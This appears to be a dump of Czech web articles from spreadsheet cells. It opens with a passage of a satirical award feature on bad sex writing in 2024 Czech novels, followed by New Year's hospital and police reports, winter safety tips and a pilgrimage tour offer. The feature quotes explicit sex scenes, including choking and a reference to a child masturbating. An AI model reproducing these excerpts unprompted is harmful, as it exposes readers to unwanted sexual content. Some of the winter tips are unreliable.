čehokoliv, co už jsem zažila. Nejraději bych za ním šla znovu ještě teď v noci a poprosila ho, ať se do mě ještě jednou na chvíli zasune. Wow! Nechutné! Anebo jsme snowflakes? Literárně vyzrálá novela třicetileté debutantky, jedno z přemilých překvapení českého knižního roku 2024, představuje Hanu. Hana miluje pana doktora, který je dvakrát starší než ona. Člověku se hned vybaví nedávné kriminální případy dr. Cimického a „doktora Prasete“, známého dřív jako dr. Barták, případně rap Young Havla Doktor Prase . Jenže tohle není jen pohled problémové lolity, která láká do altánu tátu od ženy a synka. Poslední léto (vyd. Listen) může být čteno i jako svědectví o jedné generaci. Tobě snad, milé čtenářstvo, nepřipadá, že ta patologicky netečná holka musí mít v papírech ADHD, když při výměně tělesného tepla se zarostlým MUDrem myšlenkami tak těká? Podivná věc, tato scéna. Můžeme prosím něco méně perverzního? Co třeba… Třeštící Rajdunu? Bábovky na konci světa „Miluju tě!“ vykřikne, když se do mě vystříká. Ví, že se mnou se nemusí chránit, a miluju tě říká při ejakulaci vždycky. Jsem si jistá, že to říkal i Rebece a dalším milenkám. Nejspíš by to řekl i štětce, kdyby měl někdy potřebu za sex platit. Miluju tě se dostává z jeho těla vždy spolu se spermatem. Možná ani neví o tom, že to vyslovuje. „Máš nový parfém?“ zeptám se. Dlaň mám mezi nohama, aby mi to jeho miluju tě nevyteklo v kuchyni na podlahu. Přesně odposlouchané dialogy ze světa obyčejných, možná trochu blbých lidí ( „ Martin to s dětma moc neumí,“ pokračuje. „Martinu ještě nepřebalil ani jednou, na něj prý můžou čurat jen holky od osmnácti nahoru, znáš ho.“ ). Pro čtenářky skvěle zvolená tematika – to, co podle Radky Třeštíkové nejspíš máme znát skoro všechny: máma občas nechápe, tchyně se chová jako tchyně, mateřství je peklo a muži jsou vesměs idioti a/nebo sociopati. Solidní vztahová dynamika, přesná (prostolidová) stylistika, dobré pointy ironických fórů. Jen ty sexuální scény jsou u Radky Třeštíkové pokaždé naprosto šílené. Vyžívá se v trivialitě a vulgaritě, neváhá s ponorem na bahnité dno – „Bolí mě pusa z toho, jak mu ho pořád kouřím, abych byla lepší než Milan “ ( Milan je „ta holka, co si v mobilu uložil jako Milana “ ). A protože ordinérnost a agresivita autorčina hojného erotopsaní jako by vybízely ke stejně drsným hodnocením jejího díla (vizte Databázi dojmů , pardon, www.databazeknih.cz ), poodstoupíme od šlemů a slizů a budeme jen zpovzdáli pozorovat, jak si Bábovky na konci světa (vyd. Motto) klestí cestu vzhůru žebříčky prodejů. Těžké duše Uchechtnu se, ale pak mě pohltí smutek a vztek zároveň. Tak strašně rád bych si to s někým rozdal! Chtěl bych to dělat celou noc, zabořil bych se do ženský jako do šlehačkovýho dortu, jel bych jako králíček na baterky, šukal bych i v okamžiku, kdy se tma nad střechama začíná rozpouštět, šukal bych i v době, kdy lidem zvoní budíky a začínají se šourat do koupelny, pořád bych neměl dost. Nedávno jsem zaznamenal strašnou věc. Při venčení jsem si sednul na lavičku a čučel do blba. Po zemi lezla moucha a bylo mi to tak příjemný, že místo abych ji rozmázl dlaní, tak jsem si přál, ať pokračuje, ať mě lechtá na kůži, co nejdýl to půjde, ať mi zaleze pod kraťasy. Tak moc toužím po dotyku, tak velkej jsem zoufalec. Ty vole, já tady pomalu obcuju s mouchou! „Tak strašně rád bych si to s někým rozdal!“ Přesně takové věty máme rádi, jsou totiž předzvěstí výstředního sexu – zvlášť když se objeví v knize Ivy Hadj Moussy , která už naši anketu jednou oblažila. Před třemi lety se protagonista jejího románu Démon ze sídliště , mladý adept black metalu, blýskl takřka třičtvrtěhodinovým orálním uspokojováním své partnerky. Protagonista autorčina nového románu Těžké duše (vyd. Host) je o pár dekád starší, black metal vyměnil za heavy metal… a dívku za mouchu. Jak se říká, proti gustu žádný dišputát, jen je nám líto, že moucha své dílo nedokonala a pod kraťasy stárnoucímu osamělému vypravěči nakonec nevlezla. To by se teprv děly věci! Už jen za tu představu a za ženské tělo coby šlehačkový dort si Iva Hadj Moussa osmý flek v naší anketě zaslouží. Promrhaná něha Ještě naposledy mi přejela prsy po těle, jako by mi chtěla vynahradit to krátké preventivní intermezzo, a pak věcným tónem prohlásila: „Tak jdeme na to!“ Trochu překvapeně jsem se podíval do svého rozkroku a zjistil, že ano, skutečně můžeme jít na to. Neztrácejíc teď už žádný čas, vzala jeden prezervativ z nočního stolku, v mžiku roztrhla obal a zkušeně mi jej nasadila. Mírně jsem u toho sykl bolestí. Byl jsem totiž ze zdravotních důvodů obřezaný a kromě toho, že jizva po obvodu mého pohlaví připomínala svým vzhledem trnovou korunu (což byla vskutku mnohovrstevnatá ironie), byla i po téměř dvou letech od operace značně citlivá. Adriana si to ale zřejmě vyložila jako výraz vzrušení z očekávané rozkoše a bez dalších průtahů si vložila mou maličkost do úst. Moje erekce sice stále ještě pomýšlela na dezerci, zatím se ale k ničemu neodhodlala, takže jsem přistoupil k Adrianě a zezadu do ní vnikl. Se silami už jsem byl téměř v koncích, pro stékající pot jsem už skoro nic neviděl, a ačkoliv jsem byl schopný pokračovat, orgasmus, který jsem si zde objednal, byl pořád v nedohlednu. I tak jsem ale statečně pohyboval boky a snažil se předstírat co možná největší rujnost. Adriana to taky náležitě ocenila a vzdychala čím dál vehementněji. Přidal jsem na tempu, abych v sobě mohl alespoň hýčkat pocit, že jsem napoprvé zvládl zdolat ženu se vším všudy. Naše těla do sebe narážela čím dál zběsileji a pleskavé zvuky soulože se rozléhaly celou místností. Román Promrhaná něha (vyd. Ikar ), jehož název svádí k poněkud vulgární jazykové aktualizaci, je příběhem dosud nepříliš úspěšného svůdníka, „devatenáctiletého zástupce toho méně něžného pohlaví, nadto ještě takového, jehož puberta vstoupila na scénu pozdě a s trémou“ . Od nepravděpodobného obrázku sedmiletého chlapečka masturbujícího u porna puštěného na kroužku v počítačové učebně na ZŠ se brzy přesuneme do ložnice prostitutky z tisíckrát obehrané scény „tenkrát poprvé“. Nebožák panic je na tom s obratností zhruba podobně jako pisálek se stylistikou: „Slinou, skrze kterou jsem chtěl ještě před vteřinou poprvé smyslně laskat ženu, jsem se v tu chvíli málem udusil.“ Vy se možná budete dusit odporem, ale taky trochu smíchem: kombinace akční prostitutky a bujného popisu angažujícího jak klišé, tak archaismy a tropy dobře postihuje grotesknost situace. Protagonista svírá kondom „jako kněz hostii“ a jizva po obřízce připomíná „trnovou korunu“; tady to smrdí nějakým raným traumátkem z hodin katechismu, pámbu nás netrestej. Akt sám je pro hrdinovu bolest a neustále těkající myšlenky utrpením a četba o tomto pokusu též. Tohle si v Bravíčku v rubrice Láska, sex a něžnosti číst nechcete – a v krásné literatuře už vůbec ne. Pacanka Otáčíš se k němu zády, vystrkuješ na něho zadek, obemkneš svýma nohama ty jeho, chodidly mu hladíš nárty a cítíš, jak má studená kolena. Omrzají mu, když jezdí z práce domů na kole. Je polovina září a začíná být zima. Hlavně tady, v baráku, kde nemáte centrální topení. Máš chuť a hledáš ho. Jeho penis je malý a měkký jako vždycky, když chceš. Pomáháš mu, on ti tam strčí prst. Snažíš se předstírat, že se ti ten pocit, jako by ukazoval na nějaký bod mimo tvoji vagínu, líbí. Myslíš na kluky, co tě ráno tlačili na bedra. Pustíš ho a položíš si ho na lýtko, malé, ubohé zvíře. On cítí, že jsi zklamaná, chytá tě za boky, hladí po zadku a chce tě otočit. Ty nechceš, po ránu se nerada otáčíš, žádný kontakt navíc, jen ten základní jako slepé kotě, co hledá matčinu bradavku. Problémy s erekcí mohou mít mnoho příčin; není však těžké odhadnout, co způsobilo „malý a měkký penis“ našeho cyklisty s omrzlými koleny. Leží totiž zrovna v posteli s jednou z nejprázdnějších a nejotravnějších postav české literatury posledních let. Titulní protagonistka druhé prozaické knihy novinářky Kláry Elšíkové s názvem Pacanka (vyd. Host) – tedy nikoli, pardon, Prcanka, jak by se z citované sexuální etudy snad mohlo zdát – na zhruba dvou stovkách stran po většinu času chlastá a souloží. Při těchto činnostech jí sekunduje především autorčina stylistická neobratnost, a tak bylo jen otázkou času, kdy porota BSA narazí na výživnou prasáž. Dočkali jsme se brzy, citovaná ukázka pochází hned z úvodu mimořádně nepovedené novely. Kdo by toužil po nášupu, může si knihu otevřít sám. Čtěte ovšem na vlastní nebezpečí: měkké penisy zdaleka nejsou tím nejhorším, na co v Pacance narazíte. Každý svého štěstí strůjcem Uprostřed třetí noci se mu podařilo zázračně oživit svou paličku, a za všecky předchozí oběti tak obdržela Katia těsně před odjezdem jistou satisfakci. Martin Daneš je autorem střízlivých stylistických poloh. V nové povídkové sbírce Každý svého štěstí strůjcem (vyd. Malvern ) to s výrazovou střídmostí trochu přehnal, což recenzent Reflexu Jakub Šofar okomentoval slovy: „Jazykově je to placaté, nenápadité, potřetí zalitý sáček čaje.“ „Jistou satisfakcí“ však může být laskavému čtenáři Danešových povídek metaforický výjev z textu, v němž vystupuje nadšený bubeník, jehož palička (mrk, mrk) nějakou dobu odmítá poslušnost. Nakonec se však vzchopí, a tak z toho máme krásné páté místo. Martin Daneš by zároveň mohl závodit v soutěži o to, jak napsat špatný sex s využitím co nejnižšího počtu slov. Jak se říká, méně je někdy více. S čímž by možná nesouhlasila Katia, kdybychom se jí zeptali na činnost bubeníkovy paličky. Ale to už je jiný příběh… Obyčejná laskavost Ten samotný pohlavní akt byl překvapivě snadný, a dokonce vlastně i docela hezký. Pan Krbec byl stejně jako já čerstvě vysprchovaný a oba jsme byli podobně nervózní. Větší problém ovšem nastal, když jsem zjistila, že pan Krbec je čerstvě oholený a tváře má polité kolínskou vodou 4711, kterou celý život používal otec mojí matky, takže jsem se nejdřív ze všeho musela zbavit představy, že do mě proniká penis mého dědečka, ale i tak pro mne celá ta erotická procedura byla, upřímně řečeno, kupodivu lehčí, než když třeba našim klientům vyměňuji pokálené papírové pleny. Trvalo to víceméně stejně dlouho a samozřejmě to bylo trochu zvláštní, ale na druhou stranu nemůžu říct, že by mi to bylo úplně nepříjemné nebo že to nebylo ani trochu hezké. Pan Krbec vypadal šťastně a vděčně, a přestože prapor jeho mužství posléze rychle splihl, ještě dlouho mě pak objímal a téměř dětinsky pusinkoval. Ačkoli autorská čtení Michala Viewegha se díky pamětníkům jeho báječných Báječných let pod psa nebo Účastníků zájezdu stále ještě těší velkému zájmu, tento frekventant našeho žebříčku už nepíše příliš dobře. Co rok, to kniha, to mimořádně mizerný sex. V první ze souboru autorových letošních novel Obyčejná laskavost, Neobyčejná nestoudnost (vyd. Ikar ) se hodná paní pečovatelka „pro několik miliónů Čechů stala úchylnou gerontofilní kurvou, která usouložila k smrti osmdesátiletého staříka“ , ovšem nakonec převzala z prezidentových rukou vyznamenání, protože oním aktem nezištně pomohla bližnímu svému. Ač na onen svět. Ach, jak neblaze perverzní je ona dědečkovská aluze. A co teprve paralela sex – úklid výkalů neznámých starců! Nad „splihlým praporem mužství“ by leckterá autorka prvorepublikové červené knihovny zaplesala, u starcova „dětinského pusinkování“ pak lze plakat i blinkat, jak je ctěná libost. Všimněte si, kolik nadbytečných vycpávkových slov a sousloví výše citovaná scéna skýtá, úplně samozřejmě víceméně překvapivě, upřímně řečeno. Při pohledu na řídkou sazbu a masívní bukvy posledních knih M. V. je vám jasné, že je nutné natahovat prořídlý děj, jak se dá, aby to vůbec vydalo na vydání… Neviditelný muž Skloní se a přitiskne své rty k mým, jako by ze mě chtěl vysát dech, je cítit vykouřeným tabákem, nevadí mi to, je to skutečné, bez příkras, zajede mi rukou do podprsenky, Dzak na nás čumí a bezradně poštěkává. Obcujeme spolu jako dva nepřátelé, snažíme se dobýt soupeřovo území a nic mu nedat, když Tony přiráží, jdu mu naproti, pak se ale předloktím opře o můj krk a já se začnu dusit, je to strašně rychlé, zjišťuju, že nemám žádný pud sebezáchovy a vůbec se nebráním, jen se mi před očima udělá bílo, Tony vyvrcholí, vyjdou z něj podivné zvuky, zachroptí, jako by z něj měla vylézt střeva, úplně ztratí tělesné napětí, je jako prasklý balón, odvalí se na stranu a rozpláče se, jako tehdy, když mu byly tři. Člověk se plačícímu Tonymu z novely nemůže divit. Nejenže z něj takřka lezou střeva, ještě se musí prosouložit souvětím, které se do Neviditelného muže Bianky Bellové (vyd. Host) zatoulalo nejspíš z Jirotkova Saturnina . Takové množství slov přerušované pouze čárkami se jen tak nevidí. Nutno přiznat, že autorka populárního Jezera prostor nekončící věty využila znamenitě. Jen považte, pes poštěkává, nepřátelé dobývají území, balon praská, střeva lezou, zvuky vycházejí – v tak přehlcené scéně, jíž schází snad už jen dav opilých fanoušků či žirafa na mopedu, by jeden málem přehlédl samotné milence. A přitom se tak snaží! Falešný knír Lela se svlíkne. Hnědý, potetovaný tělo. Tetování si z velký části dělala sama. Ze všeho nejvíc připomíná dílo šílenýho pavouka. Bláznivá holka z posilovny s břichem jak struhadlo. Nasedne si na mě a okamžitě zdivočí. (…) „Na co, sakra, myslíš!“ vyštěkne na mě už celá zpocená. „Soustřeď se, vole!“ Mám její obličej těsně před tím svým. Dejchá na mě vzduch horkej jak teplo z letní garáže. Přivírá oči. Hned je zase otevře. Pak mi nafackuje. Ano, vždycky jsem si přál mít trochu švihlou nymfomanku. Když mě dostatečně použije a mě bolí celý tělo, leží nahá na posteli a kouří. Dívá se do stropu. Nechá mě odejít, vysprchovat se a obléct. Když se vracím z koupelny, pořád tam leží s bubákem otočeným ke mně. Novela Falešný knír (vyd. Prostor) patrně pseudonymního Karla Zeithamla je parodickým dialogem s dílem a osobou Milana Kundery . Patrně nejslavnější český prozaik 20. století psal o sexu hodně a rád, a kdyby tvořil o pár dekád později, možná by si jeho postavy prosouložily cestu i do naší ceny. Čas je však neúprosný, a tak musel „Mistra“ zastoupit Karel Zeithaml. Podařilo se mu to znamenitě. Švihlá nymfomanka se v posteli činila, a přestože musela vypravěče přimět k pozornosti (kdo nikdy nezatoužil po tom, aby v romantickém sepětí zaslechl výzvu „Soustřeď se, vole!“ , ať hodí kamenem), zdá se, že byla nakonec spokojená. A spokojení jsme i my, bubák je krásná tečka (doslova) za touhle mimořádně živelnou scénou a autorovi blahopřejeme k druhému místu. Jů a Hele Poprvé jsme se spolu vyspali v hotelu Beránek, který stojí v Blatné na náměstí. Musel jsem Pavlu odvézt mimo Prahu , izolovat ji, abych následně dokázal zdolat jejích sto pětaosmdesát centimetrů. Musel jsem sebrat odvahu, připravit mačky, cepíny. V den výstupu jsme v rámci jednoho dlouhého tahu obešli všechny blatenské bary a restaurace. Nalil jsem tam do sebe dvojité vodky, načež jsme v hotelu Beránek nějak zavedli penis do pochvy. Beru život dost rigidně, takže jsem věřil, že tím mezi mnou a Pavlou vzniklo nějaké pouto, spíše biologické než emocionální, vazba z živé tkáně nebo nějaká dospělácká verze pupeční šňůry. Pamatuju si, že jsem tehdy po Pavlině těle musel cestovat. Byl to jakýsi island hopping. Rozutekla se mi. Měl jsem její nohy, ale hlava se kutálela pryč. Jindy jsem měl ruce, ale chybělo něco jiného. Jaké bohatství! Hrabal jsem a kvákal u toho jako kačer Skrblík. Chtěl jsem ji, zbožňoval jsem ji. Víc a víc. Ruce, nohy… Fanfáry a pentle připravit! Vítězem letošního ročníku se stává… David Zábranský ! V deníkovém románu Jů a Hele přiznává (rádoby) – enfant terrible české literatury hned na několika místech, že touží po Magnesii Liteře. Tu za čtyřsetstránkovou knihu, která je po většinu času o ničem a v níž autor útočí na kdekoho z literárního prostředí, pravděpodobně nezíská, snad si tedy pro tentokrát vystačí s Cenou Reflexu za špatný sex. Není to ostatně poprvé, kdy tento spisovatel usedl na trůn pro pisatele nejhorších erotických scén. Trofej si odnesl už v roce 2017, kdy si protagonista jeho románu Za Alpami chtěl na penisu „hýčkat“ výkaly své milé. V nové knize autor ubral na expresivitě (snad proto, že předmětem vyprávění je nyní on sám), zato přidal na stylistické topornosti. „Zavedli penis do pochvy“ ? Čteme prosím pěkně krásnou literaturu, nebo náhodný výplod aplikace ChatGPT v její nejranější fázi? Je s podivem, že nejranější fázi přežil vztah Davida a Pavly. Že by to bylo díky kvákání? Čerstvě zamilovaní nechť vyzkoušejí a podají nám zprávu! My podáváme zprávu, že horší sexuální scénu než David Zábranský v českých luzích a hájích v roce 2024 nikdo nenapsal. Autor: Kateřina Kadlecová, Kryštof Eder Autoři Kateřina Kadlecová person Kryštof Eder</t>
  </si>
  <si>
    <t>20250101_196_3695570914_8eddb6e4c596be08f9bd.html</t>
  </si>
  <si>
    <t>8eddb6e4c596be08f9bd</t>
  </si>
  <si>
    <t>Přelom roku v KNTB: první miminko, zranění pod vlivem alkoholu i problémy se zažíváním</t>
  </si>
  <si>
    <t>Přelom roku v KNTB: první miminko, zranění pod vlivem alkoholu i problémy se zažíváním Silvestrovská noc byla na urgentním příjmu Krajské nemocnice T. Bati ve Zlíně co do závažnosti úrazů celkem klidná, podle zdravotníků nedošlo k žádným vážným úrazům nebo poraněním. První miminko roku 2025 přišlo ve zlínské porodnici na svět půl hodiny po půlnoci. Prim hrál jako obvykle v tomto ročním období alkohol . Na traumatologii bylo ošetřeno kolem půlnoci a těsně po ní celkem 10 lidí, z toho devět pod vlivem alkoholu včetně jednoho, který kombinoval alkohol s návykovou látkou. „ Většina z nich po pádech, kdy naštěstí utrpěli pouze povrchová poranění typu oděrky a rány, které jim lékaři zašili a propustili je domů. Vypíchnout by se dal případ muže, který popsal, že po vypití 13 panáků tvrdého alkoholu „proběhl“ skleněnou výplní dveří,“ informovala mluvčí KNTB Dana Lipovská. Hospitalizován zůstal pouze muž, který má po rvačce zlomenou horní čelist a nos. „Ten čekal na vystřízlivění a operaci,“ zmínila Lipovská. Po půlnoci bylo dost plno také na interní pohotovosti. „Lékaři ošetřili celkem devět lidí s průjmovými problémy, křečemi v břiše, problémy se zažíváním. Nikdo z nich nebyl hospitalizován,“ pokračovala Lipovská. V 0:29 hodin přišlo v porodnici KNTB na svět první miminko nového roku 2025. „Je to holčička Natálie, je ze Zlína , a váží 3890 gramů,“ upřesnila na závěr Lipovská. Foto: KNTB</t>
  </si>
  <si>
    <t>20250101_197_3697472672_ce79dc6470c9471696c9.html</t>
  </si>
  <si>
    <t>ce79dc6470c9471696c9</t>
  </si>
  <si>
    <t>Příchod nového roku z pohledu policie</t>
  </si>
  <si>
    <t>Příchod nového roku z pohledu policie 110 Jako každý rok, tak i letos se policisté v Ústeckém kraji připravovali na oslavy v souvislosti s přechodem do nového roku. V rámci celorepublikového opatření dohlíželi na hladký průběh silvestrovské noci, ale i na různé kulturní akce a koncerty. Během silvestrovské noci přijali na operačním středisku Krajského ředitelství policie Ústeckého kraje 206 telefonních hovorů na tísňovou linku 158. V loňském roce to bylo 200. Policisté v Ústeckém kraji řešili zpravidla slovní i fyzické potyčky, kde zpravidla hlavní roli sehrál alkohol . Naštěstí během těchto potyček nebyl nikdo vážně zraněn a v rámci šetření se jednalo o přestupková jednání a přečin výtžnictví. Po celém kraji bylo nahlášeno několik požárů kontejnerů. V obci Černěves na Litoměřicku zasahovali policisté spolu s hasiči u požáru pokoje v rodinném domě, kdy podle prvotních zjištění se od přímotopu vznítily okolní věci. Došlo ke škodě na majetku, ale naštěstí se událost obešla bez zranění. Několik osob vyhrožovalo sebevraždou, ti skončili v péči lékařů. V souvislosti se zábavní pyrotechnikou došlo k vážnému úrazu osoby v Mostě . Nalezená petarda měla za následek utržené prsty a část dlaně. Osobu si převzali do péče záchranáři. Během silvestrovské noci nedošlo k žádné tragické dopravní nehodě. Autor: ink Autor person ink Rubrika transition_slide Zpravodajství z kraje</t>
  </si>
  <si>
    <t>179</t>
  </si>
  <si>
    <t>20250101_198_3695511876_6d1005794ae956544d9d.html</t>
  </si>
  <si>
    <t>6d1005794ae956544d9d</t>
  </si>
  <si>
    <t>Silvestr 2024 a Nový rok 2025 z pohledu policie</t>
  </si>
  <si>
    <t>Silvestr 2024 a Nový rok 2025 z pohledu policie 01.01.2025 12:44 POLICIE ZLÍNSKÉHO KRAJE - Letošní Silvestr byl o něco rušnější než ten loňský. Silvestrovské oslavy ve Zlínském kraji byly z pohledu policie o něco rušnější než ty loňské. Naštěstí se však obešly bez mimořádných událostí. Na náročnou službu byli policisté tak jako každý rok připraveni, a posílili výkon služby. „Od šesté hodiny večerní do šesté hodiny ranní jsme přijali na operačním středisku Krajského ředitelství policie Zlínského kraje bezmála 140 oznámení, která se týkala především rušení nočního klidu a přestupků proti veřejnému pořádku nebo občanskému soužití. U většiny těchto skutků sehrál roli alkohol . Lidé si také často stěžovali, že je obtěžuje hluk od odpalované zábavní pyrotechniky. Oproti loňskému roku bylo zhruba o čtyřicet volání na linku 158 více,“ informovala dnes Simona Kyšnerová, krajská policejní mluvčí. Během Silvestra a prvních hodin Nového roku jsme nemuseli řešit žádnou závažnější dopravní nehodu. „V průběhu noci však policisté narazili na čtyři podnapilé řidiče, kteří jsou podezřelí ze spáchání trestného činu ohrožení pod vlivem návykové látky. Tři z nich nadýchali nad jedno promile, jeden pak nad dvě promile. Nad ránem jsme asistovali u požáru domu v Jaroslavicích . Starší muž se tam nadýchal zplodin,“ pokračovala policistka. Okolo páté hodiny ranní došlo ve Zlíně k fyzickému napadení mezi dvěma podnapilými cizinci, kdy jeden z mužů skončil v nemocnici. Okolnostmi tohoto incidentu se nyní zabývají zlínští policisté. Vlastimil Langer Zdroj: Policie Zlínského kraje Ilustrační foto: Archiv SNZK Rubrika transition_slide Policie, hasiči</t>
  </si>
  <si>
    <t>20250101_199_3695525801_ccaab798fde5693a00ab.html</t>
  </si>
  <si>
    <t>ccaab798fde5693a00ab</t>
  </si>
  <si>
    <t>Jak zajistit bezpečnost při venkovních aktivitách v zimním období</t>
  </si>
  <si>
    <t>Jak zajistit bezpečnost při venkovních aktivitách v zimním období Vítězslav Hron Outdoorové aktivity v zimním období mohou být sice zábavné, ale vyžadují také zvýšenou opatrnost a důkladnou přípravu. Zde je několik klíčových bezpečnostních doporučení: Oblečení podle vrstev: Vrstvené oblečení vám umožní regulovat teplotu těla Vždy se oblékejte do více vrstev, abyste se mohli přizpůsobit měnícím se teplotám. Zajistěte si správné izolační oblečení: Investujte do kvalitního izolačního oblečení, jako jsou mikiny a bundy, které vám udrží teplo. Ochrana hlavy a rukou: Čepice a rukavice jsou nezbytné pro udržení tepla. Většina tělesného tepla se ztrácí hlavou, takže pokrývka hlavy je klíčová. Správná obuv: Vysoké a teplé zimní boty s dobrým izolačním materiálem udrží vaše nohy v teple a suchu. Dostatečná hydratace: Chladné počasí může zvýšit dehydrataci, takže pijte dostatek vody, i když nemáte pocit žízně. Poznejte znamení podchlazení a omrzlin: Naučte se rozpoznávat příznaky podchlazení a omrzlin, jako jsou necitlivé končetiny, bledá nebo modrá kůže, chladné a špatně koordinované pohyby. Pokud se objeví tyto příznaky, okamžitě jednejte. Mohlo by vás zajímat: Jednoduchá metoda pomůže vytopit byt bez nákladů navíc. Stačí pustit teplo dovnitř Zdroj obrázku: Freepik Plánování trasy a komunikace: Než vyrazíte, zjistěte očekávané počasí a informujte někoho, kdo zůstane doma, o svém plánu a časovém harmonogramu. Mějte při sobě mobilní telefon nebo jiné komunikační prostředky. Omezení doby venku: Pokud jsou podmínky extrémně nepříznivé, zvážte zkrácení času stráveného venku nebo odložení plánu na jiný den. Zajistěte dostatek jídla: Zimní aktivity vyžadují více energie. Mějte dostatek kalorií bohatých potravin a horkých nápojů. První pomoc: Mějte s sebou základní sadu první pomoci a naučte se, jak ji používat pro léčbu menších zranění nebo omrzlin. Omezte alkohol a kofein: Tyto látky mohou zvyšovat riziko podchlazení, takže se jim vyhněte, pokud možno. Pozor na známé závěje a laviny: Jestliže se vydáváte na místa, kde hrozí laviny nebo závěje sněhu, naučte se rozpoznávat rizikové situace a mějte s sebou nezbytné vybavení pro záchranné operace. Zásoby nouzového vybavení: Mějte s sebou zásoby pro případ nouze, jako jsou svítilny, palubky, sirény a topeniště. Vždy dodržujte zásady bezpečnosti a plánujte své outdoorové aktivity s ohledem na místní podmínky a dovednosti. Pamatujte, že chladné počasí může být krásné, ale také náročné, takže buďte připraveni na všechny možné situace. Zdroj: https://www.aboutkidshealth.ca/article?contentid=1954&amp;amp;language=English Autor: Vítězslav Hron Autor person Vítězslav Hron Rubrika transition_slide Aktuality</t>
  </si>
  <si>
    <t>20250101_2_3698700288_27a845f0a00a9269cbf7.html</t>
  </si>
  <si>
    <t>27a845f0a00a9269cbf7</t>
  </si>
  <si>
    <t>Pozvánka na mimořádný zájezd do Řecka a Bulharska s pobytem na ostrově Samothraki</t>
  </si>
  <si>
    <t>Pozvánka na mimořádný zájezd do Řecka a Bulharska s pobytem na ostrově Samothraki redakce Diecézní centrum pro seniory Hradec Králové zve seniory a další zájemce na mimořádný poutní zájezd do Řecka a Bulharska s pobytem na ostrově Samothraki. „Vydejte s námi na mimořádný okruh Řeckem a Bulharskem – po stopách velkého apoštola Pavla s relaxem na nádherném ostrově Samothraki spjatém se svatým Pavlem , který se během organizovaných zájezdů běžně nenavštěvuje a nyní je tu skvělá příležitost jej prozkoumat! Společně zhlédneme a prožijeme úchvatná biblická místa, historická města, významné kostely a kláštery a ochutnáme vynikající řecká i bulharská vína či známé řecké ouzo. Během zájezdu se vám bude věnovat velmi erudovaný průvodce a biblista Mons. Dr. Ján Majerník,“ zve na cestu vedoucí Diecézního centra pro seniory Veronika Čepelková. Termín: 19. – 28. 5. 2025 Uzávěrka přihlášek: 31. 1. 2025. Doporučujeme hlásit se mnohem dříve, kapacita zaplněna již z poloviny! Cena: 27.720 Kč V ceně je zahrnuto: letenky Vídeň – Sofie , Thessaloniki – Vídeň , transfer z Brna na letiště Vídeň a zpět, servisní (letištní) poplatky, 9x ubytování ve 2-3 lůžkových pokojích se snídaní, 6x večeře, doprava luxusním klimatizovaným autobusem, odborný průvodce – kněz V ceně není zahrnuto: trajekt na ostrov Samothraki s autobusem (dle aktuální ceny) – povinný příplatek, přístavní poplatky dle aktuální ceny (povinný příplatek), obslužné 50 EUR (platí se v hotovosti na místě), pobytová taxa – platí se na místě, vstupy, příplatek za jednolůžkový pokoj 6.890 Kč Možný příplatek (doporučujeme): cestovní pojištění pro účastníky zahraničních zájezdů (územní platnost Evropa ) A1 Basic, včetně storna zájezdu – pojistné krytí do výše 80 % storno poplatku v ceně 900 Kč Program: 1. den: Setkání v Brně , transfer na letiště ve Vídně . Následně odlet v 15:30 do bulharské Sofie . Po příletu soukromý transfer na ubytování. 2. den: Návštěva skutečného unikátu – Rilského kláštera, který patří mezi nejvýznamnější památky Bulharska . Sehrál významnou historickou roli, zejména v období národního sebeuvědomění. Leží na odlehlém místě uprostřed lesů a hor, celý komplex zabírá plochu 8,800 m2. Podle legendy založil klášter poustevník Ivan Rilský , který žil v jeskyni nedaleko a po kterém nese klášter i oficiálně jméno. Na dnešním místě byl postaven klášter v 1. polovině 14. století, jeho dnešní podoba pochází zejména z 19. století. Objekt v roce 1833 zničil oheň a opět byl vybudován v letech 1834 až 1862 za pomoci bohatých Bulharů z celé země v rámci bulharského národního obrození. Během osmanské nadvlády se zde uchovával bulharský jazyk a kultura. Rila je jednou z nejnavštěvovanějších bulharských památek a její vyobrazení najdete také na bulharských bankovkách, je to největší klášter pravoslavné církve v Bulharsku . Kdysi zde žilo i několik stovek mnichů, dnes jich je prý už jen kolem šedesáti. Poté budeme pokračovat do horského střediska Bansko – jedná se o malé město v centrálním jihozápadním Bulharsku , které se nachází v Blagoevgradské oblasti. Je centrem stejnojmenného okresu. Město je poměrně bohaté na památky a poblíž města se nachází Národní park Pirin. Město leží na úpatí pohoří Pirin a je největším zimním resortem na Balkánském poloostrově. 3. den: Pobyt v Bansku – budete mít možnost relaxu a koupání v hotelu, procházek, výlet lanovkou apod. Ubytování je zajištěno v hotelu Bansko SPA &amp;amp; Holidays – jedná se o čtyřhvězdičkový hotel, který se nachází jen 1000 metrů od hlavní lanovky a nádraží a přibližně 800 metrů od centra města Bansko . Hotel byl postaven v roce 2007 v moderním stylu. Je známý nejen svou dobrou polohou, ale také vynikajícími lázeňskými procedurami a terapiemi a vyhřívaným minerálním bazénem s léčivou vodou z obce Eleshnica. Na území hotelu se nachází klasická restaurace a taverna, kde najdete jak tradiční bulharská jídla, tak různé speciality z mezinárodní kuchyně. 4. – 7. den: Nicopolis ad Nestum – starověké pozdně antické římské město, které se nachází v obci Garmen . Město založil na místě velké trácké osady v roce 106 po Kr. císař Trajan. Bylo jedním ze tří míst, která postavil na počest vítězství Římské říše nad Dáky. Po přijetí křesťanství bylo Nicopolis ad Nestum jedním ze sedmi měst v Rodopách , kde bylo sídlo biskupství. Nicopolis ad Nestum bylo založeno na cestě, která spojovala pobřeží Egejského moře s vojenskou cestou Via Egnatia přes Rodopy , Tráckou nížinu a Philippopolis (dnešní Plovdiv ) a mělo velký ekonomický, politický i kulturní význam. Město bylo zničeno v 6. století, obnova nastala až v 9. – 10. století. V pozdním středověku bylo v části města bulharské osídlení a v jihovýchodní části opevněné město – turecký statek. Při archeologických výzkumech bylo odkryto 280 m hradeb, administrativní a náboženské budovy a také mohylové hroby tumulus. Je možné, že právě toto město mohlo být poctěno návštěvou apoštola Pavla , jak o tom čteme v listu Titovi (3,12). Přejezd do Řecka . Trajekt na ostrov Samothraki – ostrov, který navštívil svatý a druhého dne do makedonské Neapole .” (Sk 16,11). Samothraki nebo také Samothraké (řecky: Σαμοθράκη) Svojí velikostí se řadí na 21. místo mezi řeckými ostrovy co do rozlohy. Avšak se svou výškou 1611 m.n.m. díky vrchu Saos hrdě ční na čtvrtém místě. Ostrovní pyramida, rozbrázděná kaňony a koryty nesčetných říček a bystřin, si díky své výšce vytváří vlastní klima, v němž hlavní roli hraje voda. Ta v podobě pravidelných srážek zásobuje ostrov životodárnou vláhou. Vegetace tak září zelení i v období horkého léta. A nejen dešťové srážky – i silné prameny, obrovskými podzemními tlaky hnané do kilometrové výšky. Prameny 